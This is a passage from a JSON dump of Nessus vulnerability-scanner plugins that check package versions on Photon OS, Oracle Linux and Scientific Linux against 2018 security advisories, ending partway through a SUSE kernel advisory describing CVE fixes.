script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:nodejs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"nodejs-8.11.4-1.ph2\",\n \"nodejs-debuginfo-8.11.4-1.ph2\",\n \"nodejs-devel-8.11.4-1.ph2\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nodejs\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-22T18:27:48", "references": ["https://oss.oracle.com/pipermail/el-errata/2018-September/008042.html"], "pluginID": "117624", "description": "From Red Hat Security Advisory 2018:2732 :\n\nAn update for spice-gtk and spice-server is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe Simple Protocol for Independent Computing Environments (SPICE) is a remote display protocol for virtual environments. SPICE users can access a virtualized desktop or server from the local system or any system with network access to the server. SPICE is used in Red Hat Enterprise Linux for viewing virtualized guests running on the Kernel-based Virtual Machine (KVM) hypervisor or on Red Hat Enterprise Virtualization Hypervisors.\n\nThe spice-gtk packages provide a GIMP Toolkit (GTK+) widget for Simple Protocol for Independent Computing Environments (SPICE) clients. Both Virtual Machine Manager and Virtual Machine Viewer can make use of this widget to access virtual machines using the SPICE protocol.\n\nSecurity Fix(es) :\n\n* spice: Missing check in demarshal.py:write_validate_array_item() allows for buffer overflow and denial of service (CVE-2018-10873)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nThis issue was discovered by Frediano Ziglio (Red Hat).", "edition": 1, "reporter": "Tenable", "published": "2018-09-21T00:00:00", "title": "Oracle Linux 6 : spice-gtk / spice-server (ELSA-2018-2732)", "type": "nessus", "enchantments": {}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10873"], "modified": "2018-09-21T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:spice-server", "p-cpe:/a:oracle:linux:spice-gtk-tools", "p-cpe:/a:oracle:linux:spice-gtk-devel", "p-cpe:/a:oracle:linux:spice-glib", "p-cpe:/a:oracle:linux:spice-server-devel", "p-cpe:/a:oracle:linux:spice-gtk", "p-cpe:/a:oracle:linux:spice-gtk-python", "p-cpe:/a:oracle:linux:spice-glib-devel"], "id": "ORACLELINUX_ELSA-2018-2732.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=117624", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2018:2732 and \n# Oracle Linux Security Advisory ELSA-2018-2732 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117624);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/09/21 9:55:47\");\n\n script_cve_id(\"CVE-2018-10873\");\n script_xref(name:\"RHSA\", value:\"2018:2732\");\n\n script_name(english:\"Oracle Linux 6 : spice-gtk / spice-server (ELSA-2018-2732)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2018:2732 :\n\nAn update for spice-gtk and spice-server is now available for Red Hat\nEnterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe Simple Protocol for Independent Computing Environments (SPICE) is\na remote display protocol for virtual environments. SPICE users can\naccess a virtualized desktop or server from the local system or any\nsystem with network access to the server. SPICE is used in Red Hat\nEnterprise Linux for viewing virtualized guests running on the\nKernel-based Virtual Machine (KVM) hypervisor or on Red Hat Enterprise\nVirtualization Hypervisors.\n\nThe spice-gtk packages provide a GIMP Toolkit (GTK+) widget for Simple\nProtocol for Independent Computing Environments (SPICE) clients. Both\nVirtual Machine Manager and Virtual Machine Viewer can make use of\nthis widget to access virtual machines using the SPICE protocol.\n\nSecurity Fix(es) :\n\n* spice: Missing check in demarshal.py:write_validate_array_item()\nallows for buffer overflow and denial of service (CVE-2018-10873)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\n\nThis issue was discovered by Frediano Ziglio (Red Hat).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-September/008042.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected spice-gtk and / or spice-server packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:spice-glib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:spice-glib-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:spice-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:spice-gtk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:spice-gtk-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:spice-gtk-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:spice-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:spice-server-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/09/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"spice-glib-0.26-8.el6_10.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"spice-glib-devel-0.26-8.el6_10.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"spice-gtk-0.26-8.el6_10.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"spice-gtk-devel-0.26-8.el6_10.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"spice-gtk-python-0.26-8.el6_10.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"spice-gtk-tools-0.26-8.el6_10.1\")) flag++;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"spice-server-0.12.4-16.el6_10.1\")) flag++;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"spice-server-devel-0.12.4-16.el6_10.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"spice-glib / spice-glib-devel / spice-gtk / spice-gtk-devel / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-09-22T18:31:22", "references": ["https://github.com/vmware/photon/wiki/Security-Updates-1.0-184"], "pluginID": "117633", "description": "An update of 'linux-esx', 'linux' packages of Photon OS has been released.", "edition": 1, "reporter": "Tenable", "published": "2018-09-21T00:00:00", "title": "Photon OS 1.0: Linux PHSA-2018-1.0-0184", "type": "nessus", "enchantments": {}, "naslFamily": "PhotonOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-13053"], "modified": "2018-09-21T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:linux", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2018-1_0-0184.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=117633", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-1.0-0184. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117633);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/09/21 12:20:49\");\n\n script_cve_id(\"CVE-2018-13053\");\n\n script_name(english:\"Photon OS 1.0: Linux PHSA-2018-1.0-0184\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of 'linux-esx', 'linux' packages of Photon OS has been\nreleased.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-184\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-13053\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"linux-4.4.153-2.ph1\",\n \"linux-debuginfo-4.4.153-2.ph1\",\n \"linux-dev-4.4.153-2.ph1\",\n \"linux-docs-4.4.153-2.ph1\",\n \"linux-drivers-gpu-4.4.153-2.ph1\",\n \"linux-esx-4.4.153-2.ph1\",\n \"linux-esx-debuginfo-4.4.153-2.ph1\",\n \"linux-esx-devel-4.4.153-2.ph1\",\n \"linux-esx-docs-4.4.153-2.ph1\",\n \"linux-oprofile-4.4.153-2.ph1\",\n \"linux-sound-4.4.153-2.ph1\",\n \"linux-tools-4.4.153-2.ph1\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-1.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-22T18:14:08", "references": ["http://www.nessus.org/u?e2c11096"], "pluginID": "117627", "description": "The spice-gtk packages provide a GIMP Toolkit (GTK+) widget for Simple Protocol for Independent Computing Environments (SPICE) clients. Both Virtual Machine Manager and Virtual Machine Viewer can make use of this widget to access virtual machines using the SPICE protocol.\n\nSecurity Fix(es) :\n\n - spice: Missing check in demarshal.py:write_validate_array_item() allows for buffer overflow and denial of service (CVE-2018-10873)\n\nThis issue was discovered by Frediano Ziglio (Red Hat).", "edition": 1, "reporter": "Tenable", "published": "2018-09-21T00:00:00", "title": "Scientific Linux Security Update : spice and spice-gtk on SL7.x x86_64", "type": "nessus", "enchantments": {}, "naslFamily": "Scientific Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10873"], "modified": "2018-09-21T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20180920_SPICE_AND_SPICE_GTK_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=117627", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117627);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/09/21 9:55:47\");\n\n script_cve_id(\"CVE-2018-10873\");\n\n script_name(english:\"Scientific Linux Security Update : spice and spice-gtk on SL7.x x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The spice-gtk packages provide a GIMP Toolkit (GTK+) widget for Simple\nProtocol for Independent Computing Environments (SPICE) clients. Both\nVirtual Machine Manager and Virtual Machine Viewer can make use of\nthis widget to access virtual machines using the SPICE protocol.\n\nSecurity Fix(es) :\n\n - spice: Missing check in\n demarshal.py:write_validate_array_item() allows for\n buffer overflow and denial of service (CVE-2018-10873)\n\nThis issue was discovered by Frediano Ziglio (Red Hat).\"\n );\n # http://listserv.fnal.gov/scripts/wa.exe?A2=ind1809&L=scientific-linux-errata&F=&S=&P=1559\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e2c11096\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/09/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"spice-debuginfo-0.14.0-2.el7_5.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"spice-glib-0.34-3.el7_5.2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"spice-glib-devel-0.34-3.el7_5.2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"spice-gtk-debuginfo-0.34-3.el7_5.2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"spice-gtk-tools-0.34-3.el7_5.2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"spice-gtk3-0.34-3.el7_5.2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"spice-gtk3-devel-0.34-3.el7_5.2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"spice-gtk3-vala-0.34-3.el7_5.2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"spice-server-0.14.0-2.el7_5.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"spice-server-devel-0.14.0-2.el7_5.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-09-23T00:30:23", "references": ["https://bugzilla.suse.com/1031492", "https://bugzilla.suse.com/1099810", "https://bugzilla.suse.com/1104319", "https://bugzilla.suse.com/1020412", "https://bugzilla.suse.com/1099864", "https://bugzilla.suse.com/1106271", "https://bugzilla.suse.com/1099811", "https://bugzilla.suse.com/969470", "https://www.suse.com/security/cve/CVE-2018-1128.html", "https://bugzilla.suse.com/1107319", "https://bugzilla.suse.com/1102715", "https://bugzilla.suse.com/1098822", "https://bugzilla.suse.com/1024361", "https://bugzilla.suse.com/1066223", "https://bugzilla.suse.com/1099999", "https://bugzilla.suse.com/1105524", "https://www.suse.com/security/cve/CVE-2018-16658.html", "https://bugzilla.suse.com/1099863", "https://bugzilla.suse.com/1102797", "https://bugzilla.suse.com/1090888", "https://bugzilla.suse.com/1098253", "https://bugzilla.suse.com/1024376", "https://bugzilla.suse.com/1068075", "https://bugzilla.suse.com/1063646", "https://bugzilla.suse.com/1055014", "https://bugzilla.suse.com/1103269", "https://bugzilla.suse.com/1089066", "https://www.suse.com/security/cve/CVE-2018-10878.html", "https://bugzilla.suse.com/1022604", "https://bugzilla.suse.com/1053685", "https://bugzilla.suse.com/1106185", "https://bugzilla.suse.com/1104494", "https://www.suse.com/security/cve/CVE-2018-13093.html", "https://bugzilla.suse.com/1099846", "https://bugzilla.suse.com/1015342", "https://bugzilla.suse.com/963575", "https://www.suse.com/security/cve/CVE-2018-10881.html", "https://bugzilla.suse.com/1104485", "https://bugzilla.suse.com/1107060", "https://bugzilla.suse.com/1106229", "https://bugzilla.suse.com/1105769", "https://bugzilla.suse.com/1106934", "https://bugzilla.suse.com/1106511", "https://bugzilla.suse.com/969476", "https://www.suse.com/security/cve/CVE-2018-10882.html", "https://bugzilla.suse.com/1105536", "https://bugzilla.suse.com/1050431", "https://bugzilla.suse.com/1085536", "https://bugzilla.suse.com/1027968", "https://bugzilla.suse.com/1104897", "https://bugzilla.suse.com/1102517", "https://bugzilla.suse.com/1106105", "https://bugzilla.suse.com/1100000", "https://bugzilla.suse.com/1065364", "https://bugzilla.suse.com/1102346", "https://bugzilla.suse.com/1096254", "https://bugzilla.suse.com/1012382", "https://bugzilla.suse.com/1099845", "https://bugzilla.suse.com/1107735", "https://bugzilla.suse.com/1105392", "https://bugzilla.suse.com/1064232", "https://www.suse.com/security/cve/CVE-2018-6555.html", "https://bugzilla.suse.com/1106016", "https://bugzilla.suse.com/1099597", "https://bugzilla.suse.com/1105323", "https://www.suse.com/security/cve/CVE-2018-10902.html", "https://bugzilla.suse.com/1106283", "https://www.suse.com/security/cve/CVE-2018-6554.html", "https://bugzilla.suse.com/1105322", "https://bugzilla.suse.com/966172", "https://bugzilla.suse.com/1107320", "https://bugzilla.suse.com/1106995", "https://bugzilla.suse.com/1101822", "https://bugzilla.suse.com/970506", "https://bugzilla.suse.com/1042286", "https://bugzilla.suse.com/1024365", "https://www.suse.com/security/cve/CVE-2018-1129.html", "https://bugzilla.suse.com/1096748", "https://bugzilla.suse.com/1056596", "https://bugzilla.suse.com/1099844", "https://bugzilla.suse.com/1103717", "https://bugzilla.suse.com/1068032", "https://bugzilla.suse.com/1015343", "https://bugzilla.suse.com/1078921", "https://bugzilla.suse.com/1103445", "https://bugzilla.suse.com/1021121", "https://bugzilla.suse.com/1069138", "https://bugzilla.suse.com/1091171", "https://bugzilla.suse.com/1017967", "https://bugzilla.suse.com/1085042", "https://bugzilla.suse.com/1080157", "https://www.suse.com/security/cve/CVE-2018-13094.html", "https://bugzilla.suse.com/1091860", "https://bugzilla.suse.com/1106509", "https://bugzilla.suse.com/1107078", "https://bugzilla.suse.com/1106929", "https://bugzilla.suse.com/966170", "https://bugzilla.suse.com/1019699", "https://www.suse.com/security/cve/CVE-2018-10876.html", "https://bugzilla.suse.com/1097105", "https://bugzilla.suse.com/1105271", "https://bugzilla.suse.com/1107689", "https://bugzilla.suse.com/1083663", "https://www.suse.com/security/cve/CVE-2018-10938.html", "https://bugzilla.suse.com/1099813", "https://bugzilla.suse.com/1105292", "https://bugzilla.suse.com/1107966", "https://bugzilla.suse.com/1104495", "https://bugzilla.suse.com/1106275", "https://bugzilla.suse.com/1106281", "https://bugzilla.suse.com/1062604", "https://bugzilla.suse.com/1102486", "https://www.suse.com/security/cve/CVE-2018-9363.html", "https://www.suse.com/security/cve/CVE-2018-12896.html", "https://bugzilla.suse.com/1106278", "https://bugzilla.suse.com/1087092", "https://www.suse.com/security/cve/CVE-2018-13095.html", "https://bugzilla.suse.com/1106369", "https://www.suse.com/security/cve/CVE-2018-15572.html", "https://bugzilla.suse.com/1019695", "https://www.suse.com/security/cve/CVE-2018-10879.html", "https://bugzilla.suse.com/1099832", "https://bugzilla.suse.com/1085539", "https://bugzilla.suse.com/1048317", "https://bugzilla.suse.com/1086457", "https://www.suse.com/security/cve/CVE-2018-10877.html", "https://bugzilla.suse.com/969477", "https://bugzilla.suse.com/1099849", "https://bugzilla.suse.com/1033962", "https://bugzilla.suse.com/1104683", "https://bugzilla.suse.com/1100132", "https://www.suse.com/security/cve/CVE-2018-10880.html", "https://bugzilla.suse.com/1106276", "https://www.suse.com/security/cve/CVE-2018-10883.html", "https://bugzilla.suse.com/1100001", "https://bugzilla.suse.com/1105396", "https://bugzilla.suse.com/1030552", "https://bugzilla.suse.com/1099922", "http://www.nessus.org/u?76af87a5", "https://bugzilla.suse.com/1101841", "https://bugzilla.suse.com/1106697"], "pluginID": "117629", "description": "The SUSE Linux Enterprise 12 SP3 kernel was updated to 4.4.155 to receive various security and bugfixes.\n\nThe following security bugs were fixed :\n\nCVE-2018-13093: Prevent NULL pointer dereference and panic in lookup_slow() on a NULL inode->i_ops pointer when doing pathwalks on a corrupted xfs image. This occured because of a lack of proper validation that cached inodes are free during allocation (bnc#1100001).\n\nCVE-2018-13095: Prevent denial of service (memory corruption and BUG) that could have occurred for a corrupted xfs image upon encountering an inode that is in extent format, but has more extents than fit in the inode fork (bnc#1099999).\n\nCVE-2018-13094: Prevent OOPS that may have occured for a corrupted xfs image after xfs_da_shrink_inode() is called with a NULL bp (bnc#1100000).\n\nCVE-2018-12896: Prevent integer overflow in the POSIX timer code that was caused by the way the overrun accounting works. Depending on interval and expiry time values, the overrun can be larger than INT_MAX, but the accounting is int based. This basically made the accounting values, which are visible to user space via timer_getoverrun(2) and siginfo::si_overrun, random. This allowed a local user to cause a denial of service (signed integer overflow) via crafted mmap, futex, timer_create, and timer_settime system calls (bnc#1099922).\n\nCVE-2018-16658: Prevent information leak in cdrom_ioctl_drive_status that could have been used by local attackers to read kernel memory (bnc#1107689).\n\nCVE-2018-6555: The irda_setsockopt function allowed local users to cause a denial of service (ias_object use-after-free and system crash) or possibly have unspecified other impact via an AF_IRDA socket (bnc#1106511).\n\nCVE-2018-6554: Prevent memory leak in the irda_bind function that allowed local users to cause a denial of service (memory consumption) by repeatedly binding an AF_IRDA socket (bnc#1106509).\n\nCVE-2018-1129: A flaw was found in the way signature calculation was handled by cephx authentication protocol. An attacker having access to ceph cluster network who is able to alter the message payload was able to bypass signature checks done by cephx protocol (bnc#1096748).\n\nCVE-2018-1128: It was found that cephx authentication protocol did not verify ceph clients correctly and was vulnerable to replay attack. Any attacker having access to ceph cluster network who is able to sniff packets on network can use this vulnerability to authenticate with ceph service and perform actions allowed by ceph service (bnc#1096748).\n\nCVE-2018-10938: A crafted network packet sent remotely by an attacker forced the kernel to enter an infinite loop in the cipso_v4_optptr() function leading to a denial-of-service (bnc#1106016).\n\nCVE-2018-15572: The spectre_v2_select_mitigation function did not always fill RSB upon a context switch, which made it easier for attackers to conduct userspace-userspace spectreRSB attacks (bnc#1102517).\n\nCVE-2018-10902: Protect against concurrent access to prevent double realloc (double free) in snd_rawmidi_input_params() and snd_rawmidi_output_status(). A malicious local attacker could have used this for privilege escalation (bnc#1105322 1105323).\n\nCVE-2018-9363: Prevent buffer overflow in hidp_process_report (bsc#1105292)\n\nCVE-2018-10883: A local user could have caused an out-of-bounds write in jbd2_journal_dirty_metadata(), a denial of service, and a system crash by mounting and operating on a crafted ext4 filesystem image (bsc#1099863).\n\nCVE-2018-10879: A local user could have caused a use-after-free in ext4_xattr_set_entry function and a denial of service or unspecified other impact by renaming a file in a crafted 